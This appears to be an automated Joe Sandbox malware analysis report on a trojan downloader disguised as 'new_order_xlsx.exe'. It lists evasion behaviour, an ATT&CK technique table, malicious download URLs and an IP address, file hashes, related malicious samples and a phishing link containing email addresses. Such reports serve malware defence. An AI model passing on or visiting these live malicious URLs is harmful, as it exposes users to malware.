              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exe TID: 7060Thread sleep time: -30000s >= -30000sJump to behavior
              Source: Amcache.hve.4.drBinary or memory string: VMware
              Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: new_order_xlsx.exe, 00000000.00000002.275942535.0000000000934000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: Amcache.hve.4.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.4.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
              Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
              Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.4.drBinary or memory string: VMware7,1
              Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: new_order_xlsx.exe, 00000000.00000003.262261522.000000000097A000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.260073295.000000000097A000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.240666115.0000000000962000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.275942535.000000000097A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.me
              Source: new_order_xlsx.exe, 00000000.00000003.262261522.0000000000969000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.260073295.0000000000969000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.275942535.0000000000969000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.240666115.0000000000962000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW]
              Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess queried: DebugPortJump to behavior
              Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1
              DLL Side-Loading
              1
              Process Injection
              2
              Virtualization/Sandbox Evasion
              1
              Input Capture
              21
              Security Software Discovery
              Remote Services1
              Input Capture
              Exfiltration Over Other Network Medium11
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory2
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              Exfiltration Over Bluetooth3
              Ingress Tool Transfer
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information
              Security Account Manager1
              Remote System Discovery
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              DLL Side-Loading
              NTDS1
              System Information Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer114
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              new_order_xlsx.exe79%ReversingLabsWin32.Trojan.Leonem
              new_order_xlsx.exe100%AviraTR/AD.DelfDownloader.evrog
              new_order_xlsx.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://balkancelikdovme.com:443/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf-100%Avira URL Cloudmalware
              https://balkancelikdovme.com/L100%Avira URL Cloudmalware
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfr100%Avira URL Cloudmalware
              https://balkancelikdovme.com:443/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf100%Avira URL Cloudmalware
              http://://t.exet.exe0%Avira URL Cloudsafe
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              balkancelikdovme.com
              185.181.116.217
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwftrue
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfrnew_order_xlsx.exe, 00000000.00000003.240666115.0000000000962000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://balkancelikdovme.com/Lnew_order_xlsx.exe, 00000000.00000003.260073295.000000000097A000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.262261522.000000000097D000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://balkancelikdovme.com/lnew_order_xlsx.exe, 00000000.00000002.275942535.000000000097D000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.240666115.0000000000962000.00000004.00000020.00020000.00000000.sdmptrue
                  unknown
                  http://upx.sf.netAmcache.hve.4.drfalse
                    high
                    https://balkancelikdovme.com:443/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfnew_order_xlsx.exe, 00000000.00000003.262238156.0000000015D86000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.260073295.00000000009C3000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://://t.exet.exenew_order_xlsx.exe, 00000000.00000002.275793042.000000000019B000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    https://balkancelikdovme.com:443/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf-new_order_xlsx.exe, 00000000.00000002.275942535.0000000000969000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://www.pmail.comnew_order_xlsx.exe, 00000000.00000003.233032153.0000000002830000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.232976125.00000000027FC000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233341342.0000000002856000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.232909822.0000000003524000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233225957.0000000002831000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233117182.0000000002830000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.277020844.0000000003639000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233052897.0000000002868000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.232945853.00000000035FA000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233583426.0000000002835000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233678764.0000000002835000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233175803.0000000002868000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233261183.0000000002830000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233481160.0000000002834000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233077756.0000000002830000.00000004.00001000.00020000.00000000.sdmpfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      185.181.116.217
                      balkancelikdovme.comUnited Kingdom
                      29017GYRONGBtrue
                      IP
                      192.168.2.1
                      Joe Sandbox Version:38.0.0 Beryl
                      Analysis ID:1303012
                      Start date and time:2023-09-04 16:23:59 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 53s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample file name:new_order_xlsx.exe
                      Detection:MAL
                      Classification:mal92.troj.winEXE@2/6@28/2
                      EGA Information:Failed
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 7
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.189.173.20
                      • Excluded domains from analysis (whitelisted): kv601.prod.do.dsp.mp.microsoft.com, ris.api.iris.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, login.live.com, eudb.ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, tse1.mm.bing.net, watson.telemetry.microsoft.com, arc.msn.com
                      • Execution Graph export aborted for target new_order_xlsx.exe, PID 6996 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: new_order_xlsx.exe
                      TimeTypeDescription
                      16:25:04API Interceptor48x Sleep call for process: new_order_xlsx.exe modified
                      16:25:23API Interceptor1x Sleep call for process: WerFault.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.181.116.217r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                      • balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
                      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                      • balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      balkancelikdovme.comr096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                      • 185.181.116.217
                      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                      • 185.181.116.217
                      0vJrK0NCd1.exeGet hashmaliciousRemcos, DBatLoader, FloodFixBrowse
                      • 185.181.116.217
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      GYRONGBr096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                      • 185.181.116.217
                      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                      • 185.181.116.217
                      0vJrK0NCd1.exeGet hashmaliciousRemcos, DBatLoader, FloodFixBrowse
                      • 185.181.116.217
                      CX17SY6xF6.exeGet hashmaliciousPushdoBrowse
                      • 83.223.113.46
                      PIyT9A3jfC.exeGet hashmaliciousPushdoBrowse
                      • 83.223.113.46
                      nhVJ8J5qOt.exeGet hashmaliciousPushdoBrowse
                      • 83.223.113.46
                      fs7AQcREFX.exeGet hashmaliciousPushdoBrowse
                      • 83.223.113.46
                      https://farma-net.com/admin/auth?userid=rob.mayberry@gelita.comGet hashmaliciousHTMLPhisherBrowse
                      • 89.145.93.101
                      IrJyqwDp6P.elfGet hashmaliciousMirai, MoobotBrowse
                      • 83.223.101.7
                      6gjnnBAbpc.exeGet hashmaliciousPushdoBrowse
                      • 83.223.113.46
                      sora.arm7.elfGet hashmaliciousMiraiBrowse
                      • 83.223.101.9
                      iJzpyjAehB.exeGet hashmaliciousPushdoBrowse
                      • 83.223.113.46
                      EksRd2mRLH.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                      • 83.223.113.46
                      rLDmqbpt5D.exeGet hashmaliciousPushdo, DanaBot, RedLine, SmokeLoaderBrowse
                      • 83.223.113.46
                      irLUxBeO3j.elfGet hashmaliciousMiraiBrowse
                      • 212.113.144.7
                      d4bNCWDk1F.exeGet hashmaliciousPushdoBrowse
                      • 83.223.113.46
                      file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                      • 83.223.113.46
                      https://s3.amazonaws.com/appforest_uf/f1673569031431x837044964462498200/index.xhtml?17373464282007070576159867576718836072896596236213191414781774633016138409263067560810655664611593768691127511520387902715816470054901430985217113983744921341215241681383688426527535794966000143072299496022028714025186539246245021092115024781420437166872573917715270671544911886953886795996849529998276450=!!ERROR%20IN%20FUNCTION%20PARAMETERS!!%20'boyd.eastman@imail.org'%20ist%20kein%20g%C3%BCltiger%20Integerwert&1765620972=Ym95ZC5lYXN0bWFuQGltYWlsLm9yZw==&1/16/202318961133127049864077866167768198212901460441750214020786111898549251534145544273852461499171043240208500698254918200574448252831614537487276212299050019524818481725182239195411702340331216281502686321309755971688813861&email=boyd.eastman@imail.org&2048532416162595706016219186831446773579524518014200612466611761644571231872529944108636910539217157238248758958712136946159490521927112180269811067101566160108479243853193319321023555707545963759105821172180882197934179314148125212682089161392996891286741775134210235114693034421458487518136059350121079991895186634721265116660=138892235Get hashmaliciousHTMLPhisherBrowse
                      • 83.223.113.113
                      1EsDtA4mep.exeGet hashmaliciousPushdoBrowse
                      • 83.223.113.46
                      MYorfmVq9Z.exeGet hashmaliciousPushdoBrowse
                      • 83.223.113.46
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ce5f3254611a8c095a3d821d44539877file.exeGet hashmaliciousSmokeLoaderBrowse
                      • 185.181.116.217
                      cv4TCGxUjvS.exeGet hashmaliciousKnightCryptBrowse
                      • 185.181.116.217
                      8_0.exeGet hashmaliciousKnightCryptBrowse
                      • 185.181.116.217
                      cv4TCGxUjvS.exeGet hashmaliciousUnknownBrowse
                      • 185.181.116.217
                      8_0.exeGet hashmaliciousUnknownBrowse
                      • 185.181.116.217
                      HhcSy5LcAb.exeGet hashmaliciousVidar, onlyLoggerBrowse
                      • 185.181.116.217
                      dbnXGwXFlH.exeGet hashmaliciousVidar, onlyLoggerBrowse
                      • 185.181.116.217
                      mh3J5rNiL7.exeGet hashmaliciousLummaC StealerBrowse
                      • 185.181.116.217
                      hXc1HKdJz9.exeGet hashmaliciousLummaC StealerBrowse
                      • 185.181.116.217
                      file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                      • 185.181.116.217
                      file.exeGet hashmaliciousSmokeLoaderBrowse
                      • 185.181.116.217
                      dhvJVmmIiU.exeGet hashmaliciousSmokeLoaderBrowse
                      • 185.181.116.217
                      NLbhtKL2l6.exeGet hashmaliciousSmokeLoaderBrowse
                      • 185.181.116.217
                      FXpqBlJk7x.exeGet hashmaliciousVidar, onlyLoggerBrowse
                      • 185.181.116.217
                      file.exeGet hashmaliciousSmokeLoaderBrowse
                      • 185.181.116.217
                      92.exeGet hashmaliciousKnightCryptBrowse
                      • 185.181.116.217
                      12.exeGet hashmaliciousKnightCryptBrowse
                      • 185.181.116.217
                      12.exeGet hashmaliciousUnknownBrowse
                      • 185.181.116.217
                      92.exeGet hashmaliciousUnknownBrowse
                      • 185.181.116.217
                      file.exeGet hashmaliciousSmokeLoaderBrowse
                      • 185.181.116.217
                      No context
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):1.1199947849432146
                      Encrypted:false
                      SSDEEP:192:T18lB3XKHHBUZMX4jN4PO4pY/u7sAS274Its:G3XUBUZMX4jkY/u7sAX4Its
                      MD5:CAAF23BB44B1DCDF54E9A5B80A334E37
                      SHA1:5A465C3D378B9B5C8EC54A8915B4C3357C225FCF
                      SHA-256:3F31CDAF2C9FB3D7BFAC7E7438A8562FCBA22163B65B502EEDA4DDEC1EAE8B42
                      SHA-512:1561361B893EE580CC6E96D5774ABFFC41CCA4544BF8F36C063336B5E3A7DBDA17D98E459023347C89B4CCC33574811C64272FB4FB6B9B2893C8C104885FA379
                      Malicious:false
                      Reputation:low
                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.8.3.1.1.1.2.1.8.5.8.0.7.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.8.3.1.1.1.2.2.6.3.8.0.6.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.5.3.3.0.e.a.-.2.6.f.3.-.4.4.4.3.-.a.b.d.f.-.d.5.b.b.b.1.6.0.2.f.f.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.8.7.f.c.a.6.-.1.f.1.3.-.4.9.8.5.-.9.c.4.7.-.d.0.8.8.3.4.e.b.9.9.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.e.w._.o.r.d.e.r._.x.l.s.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.4.-.0.0.0.1.-.0.0.2.6.-.a.4.e.9.-.3.1.9.7.3.b.d.f.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.4.8.b.5.7.a.8.0.7.2.2.5.4.1.6.8.5.1.8.6.8.a.2.b.9.7.4.4.7.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.8.a.c.1.5.c.f.8.4.5.2.4.9.b.2.a.7.c.9.c.0.9.5.8.0.8.1.5.3.6.5.6.5.7.9.b.1.7.0.4.!.n.e.w._.o.r.d.e.r._.x.l.s.x...e.x.e.....T.
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Mini DuMP crash report, 15 streams, Mon Sep 4 14:25:22 2023, 0x1205a4 type
                      Category:dropped
                      Size (bytes):139332
                      Entropy (8bit):2.185835877758525
                      Encrypted:false
                      SSDEEP:384:qXJAe2faeZ1PaZEf9abH+iIGhv40LtxLrMPZR7ezZsM/5tIkJPkD:qfDeZ0ZEfZi1x40XOZRimyII4
                      MD5:02FB47B11F3FEE8B9B7695FDF1CACB03
                      SHA1:64840F2EFC5B29544CD52380C37A78A87C9A88EE
                      SHA-256:5CB8BD5565B4F8621E119FF34DD85F12E9AF10FC44851B00BCFDFE27C09C8036
                      SHA-512:2B0736931B2B34496D426099A16DD3C4765A22B3D396C5A70B16DEBA068471EA9E00FDF365F23795DBC985BF525C1622E64EFCB2CD59AED2E054FCA594008376
                      Malicious:false
                      Reputation:low
                      Preview:MDMP....... ..........d............t...........<................(......D...Vg..........`.......8...........T...........PV...........................0...................................................................U...........B......T1......GenuineIntelW...........T.......T......d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8360
                      Entropy (8bit):3.7023397611962614
                      Encrypted:false
                      SSDEEP:192:Rrl7r3GLNiElA6F6YiidSUpTgmf14p8SRj+prc89b2bsfxASm:RrlsNiJ6F6YtSUpTgmf14+SY2gfe
                      MD5:07C4C11EFC9702209AA854F37474EC8B
                      SHA1:09231AC55F4E6E28B783C7247B7C9EFE56AE49AC
                      SHA-256:42D82AB70B4C0A374D12DE13E0F15A359DC0AC9E4694B6E1E9CA3D8C74A32F7A
